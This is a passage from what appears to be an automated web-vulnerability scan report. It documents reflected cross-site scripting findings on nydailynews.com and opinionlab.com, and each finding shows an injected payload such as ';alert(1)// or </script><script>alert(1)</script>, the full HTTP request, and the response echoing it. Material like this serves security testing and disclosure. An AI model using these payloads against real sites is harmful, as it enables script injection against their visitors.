The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0e8f'%3balert(1)//10ffe396caa was submitted in the REST URL parameter 2. This input was echoed as a0e8f';alert(1)//10ffe396caa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/baseballa0e8f'%3balert(1)//10ffe396caa/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:23 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69846

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports/baseballa0e8f';alert(1)//10ffe396caa/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html';
}
//-->
...[SNIP]...

4.212. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a909'%3balert(1)//aa28d82e17b was submitted in the REST URL parameter 3. This input was echoed as 3a909';alert(1)//aa28d82e17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/baseball/yankees3a909'%3balert(1)//aa28d82e17b/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:35 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69846

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports/baseball/yankees3a909';alert(1)//aa28d82e17b/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html';
}
//-->
...[SNIP]...

4.213. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 628cf'%3balert(1)//4f051986422 was submitted in the REST URL parameter 4. This input was echoed as 628cf';alert(1)//4f051986422 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/baseball/yankees/2011628cf'%3balert(1)//4f051986422/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:47 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69846

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
y.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports/baseball/yankees/2011628cf';alert(1)//4f051986422/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html';
}
//-->
...[SNIP]...

4.214. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfa16'%3balert(1)//613bf33760e was submitted in the REST URL parameter 5. This input was echoed as cfa16';alert(1)//613bf33760e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/baseball/yankees/2011/08cfa16'%3balert(1)//613bf33760e/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:56 GMT
Server: Apache
Keep-Alive: timeout=3, max=999
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69846

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
ookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports/baseball/yankees/2011/08cfa16';alert(1)//613bf33760e/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html';
}
//-->
...[SNIP]...

4.215. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96e84'%3balert(1)//ac257857d1c was submitted in the REST URL parameter 6. This input was echoed as 96e84';alert(1)//ac257857d1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/baseball/yankees/2011/08/1196e84'%3balert(1)//ac257857d1c/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:47:06 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69846

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
ie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports/baseball/yankees/2011/08/1196e84';alert(1)//ac257857d1c/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html';
}
//-->
...[SNIP]...

4.216. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c8a'%3balert(1)//f3a23f825a9 was submitted in the REST URL parameter 7. This input was echoed as 49c8a';alert(1)//f3a23f825a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html49c8a'%3balert(1)//f3a23f825a9 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:47:16 GMT
Server: Apache
Keep-Alive: timeout=3, max=997
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69846

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
lynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html49c8a';alert(1)//f3a23f825a9';
}
//-->
...[SNIP]...

4.217. http://www.nydailynews.com/sports/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf3f'%3balert(1)//71f8b572442 was submitted in the REST URL parameter 1. This input was echoed as 3bf3f';alert(1)//71f8b572442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports3bf3f'%3balert(1)//71f8b572442/index.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.4.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:39 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69732

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports3bf3f';alert(1)//71f8b572442/index.html';
}
//-->
...[SNIP]...

4.218. http://www.nydailynews.com/sports/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 324af'%3balert(1)//48d92f1efda was submitted in the REST URL parameter 2. This input was echoed as 324af';alert(1)//48d92f1efda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/index.html324af'%3balert(1)//48d92f1efda HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.4.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:51 GMT
Server: Apache
Keep-Alive: timeout=3, max=997
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69732

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports/index.html324af';alert(1)//48d92f1efda';
}
//-->
...[SNIP]...

4.219. http://www.opinionlab.com/content [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opinionlab.com
Path:	/content

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd8a</script><script>alert(1)</script>91c9b453f97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /content?1cd8a</script><script>alert(1)</script>91c9b453f97=1 HTTP/1.1
Host: www.opinionlab.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/site_map
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.13
X-Pingback: http://www.opinionlab.com/content/xmlrpc.php
Set-Cookie: OLRURI=http%3A%2F%2Fwww.iab.net%2Fsite_map%7Chttp%3A%2F%2Fwww.iab.net%2Fsite_map; expires=Fri, 31-Aug-2012 16:15:40 GMT; path=/
Set-Cookie: OLRTYPE=Brand%7CBrand; expires=Fri, 31-Aug-2012 16:15:40 GMT; path=/
Set-Cookie: OLTRMS=NONE%7CNONE; expires=Fri, 31-Aug-2012 16:15:40 GMT; path=/
Set-Cookie: OLCIDS=%7C; expires=Fri, 31-Aug-2012 16:15:40 GMT; path=/
X-Powered-By: ASP.NET
ETags: ""
Date: Thu, 01 Sep 2011 16:15:41 GMT
Content-Length: 28123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName=oPageName
s.server=ol_siteURL
s.channel="/content/?1cd8a</script><script>alert(1)</script>91c9b453f97=1" // Section name
s.campaign=""
s.prop1=oPageName // page name
s.prop2="5767.4e5faf709594e1.24524238" // WEBID
/* Custom variables for custom reporting */
s.eVar1=oPageName
s.eVar2="5767.4e5f
...[SNIP]...

4.220. http://www.opinionlab.com/content/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.opinionlab.com
Path:	/content/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61856</script><script>alert(1)</script>d1297f41988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/?61856</script><script>alert(1)</script>d1297f41988=1 HTTP/1.1
Host: www.opinionlab.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/site_map
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
